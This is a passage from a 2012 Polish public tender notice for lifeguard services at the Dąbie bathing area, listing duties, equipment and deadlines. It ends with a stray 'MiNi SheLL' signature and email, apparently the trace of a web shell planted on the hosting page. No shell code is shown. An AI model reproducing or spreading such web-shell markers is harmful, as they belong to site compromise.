  i)  oczyszczanie powierzchni i dna obszaru przeznaczonego do kąpieli z wszelkich przedmiotów mogących spowodować skaleczenia lub inny nieszczęśliwy wypadek, przy udziale wyznaczonego pracownika kąpieliska i potwierdzenie wpisem do dziennika pracy,
 j)	bieżące prowadzenie dziennika pracy,
     9)   zapewnienia sprzętu ratowniczego, sprzętu do udzielania pierwszej pomocy,
            wyposażenia ratowników, napojów dla ratowników (1 l dziennie na osobę),
    10)	ścisłą współpracę z Kierownikiem kąpieliska oraz natychmiastowe informowanie 
            Kierownika kąpieliska o każdym zdarzeniu wymagającym interwencji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.25.20.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonywanie ratownictwa wodnego na kąpielisku Dąbie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotu zamówienia obejmuje m. in.:
1)	zapewnienie obsady i koordynacji pracy ratowników, zgodnie z rozporządzeniem Ministra Spraw Wewnętrznych z dnia 23 stycznia 2012 r. w sprawie minimalnych wymagań dotyczących liczby ratowników wodnych zapewniających stałą kontrolę wyznaczonego obszaru wodnego (Dz.U. z 2012 r. Nr 108),
2)	zapewnienie warunków do organizowania pomocy oraz ratowania osób, które uległy wypadkowi lub są narażone na niebezpieczeństwo utraty życia lub zdrowia,
3)	zapewnienie stałej kontroli wyznaczonego obszaru wodnego przez ratowników   wodnych, zgodnie z rozporządzeniem Ministra Spraw Wewnętrznych z dnia 6 marca 2012 r.  w sprawie sposobu oznakowania i zabezpieczania obszarów wodnych oraz wzorów znaków zakazu, nakazu oraz znaków informacyjnych i flag (Dz.U. z 2012 r. Nr 286), m.in.:
a)  wytyczenie strefy dla umiejących i nieumiejących pływać,
	b)  wydzielenie brodzika dla dzieci,
4)	utworzenie stanowisk do obserwacji wyznaczonego obszaru wodnego,
5)	 wyposażenie w sprzęt ratunkowy i pomocniczy oraz urządzenie sygnalizacyjne 
i ostrzegawcze, zgodnie z rozporządzeniem Ministra Spraw Wewnętrznych z dnia 
27 lutego 2012 r. w sprawie wymagań dotyczących wyposażenia wyznaczonych obszarów wodnych w sprzęt ratunkowy i pomocniczy, urządzenia sygnalizacyjne 
i ostrzegawcze oraz sprzęt medyczny, leki i artykuły sanitarne (Dz.U. z 2012 r. 
Nr 261),
6)	oczyszczanie powierzchni dna obszaru przeznaczonego do pływania i kąpieli 
z wszelkich przedmiotów mogących spowodować skaleczenie lub inny wypadek,
7)	upowszechnianie zasad korzystania z wyznaczonego obszaru wodnego,
8)	obowiązki ratowników wodnych, zgodnie z ustawą z dnia 18 sierpnia 2011 r. 
o bezpieczeństwie osób przebywających na obszarach wodnych (Dz.U. z 2011 r. Nr 208 poz. 1240 ze zmianami) obejmujące m.in.:
  a)  stałe obserwowanie obszaru kąpieliska i niezwłoczne reagowanie na każdy sygnał wzywania pomocy oraz podejmowania akcji ratowniczej,
  b)	kontrola stanu urządzeń oraz sprzętu, które zapewniają bezpieczeństwo osób kąpiących się,
  c)	kontrola stref dla umiejących i nieumiejących pływać,
  d)	wywieszanie na maszcie odpowiednich kolorów flag informacyjnych,
  e)	sygnalizowanie za pomocą urządzeń alarmowych, przekroczeń obowiązującego regulaminu (np. granicy strefy dla umiejących pływać, skoki do wody), nadchodzącej burzy,
  f)	reagowanie na wszelkie wypadki naruszenia regulaminu obowiązującego na terenie kąpieliska lub pływalni,
  g)	wpisywanie na tablicy informacyjnej temperatury wody, temperatury powietrza oraz innych aktualnych informacji,
  h)	codzienne kontrolowanie głębokości wody przed otwarciem kąpieliska, a w razie potrzeby - przesunięcie lub czasowe wyłączenie określonych obszarów kąpieliska z używalności, miejsca kąpieli,
  i)  oczyszczanie powierzchni i dna obszaru przeznaczonego do kąpieli z wszelkich przedmiotów mogących spowodować skaleczenia lub inny nieszczęśliwy wypadek, przy udziale wyznaczonego pracownika kąpieliska i potwierdzenie wpisem do dziennika pracy,
 j)	bieżące prowadzenie dziennika pracy,
     9)   zapewnienia sprzętu ratowniczego, sprzętu do udzielania pierwszej pomocy,
            wyposażenia ratowników, napojów dla ratowników (1 l dziennie na osobę),
    10)	ścisłą współpracę z Kierownikiem kąpieliska oraz natychmiastowe informowanie 
            Kierownika kąpieliska o każdym zdarzeniu wymagającym interwencji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.25.20.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com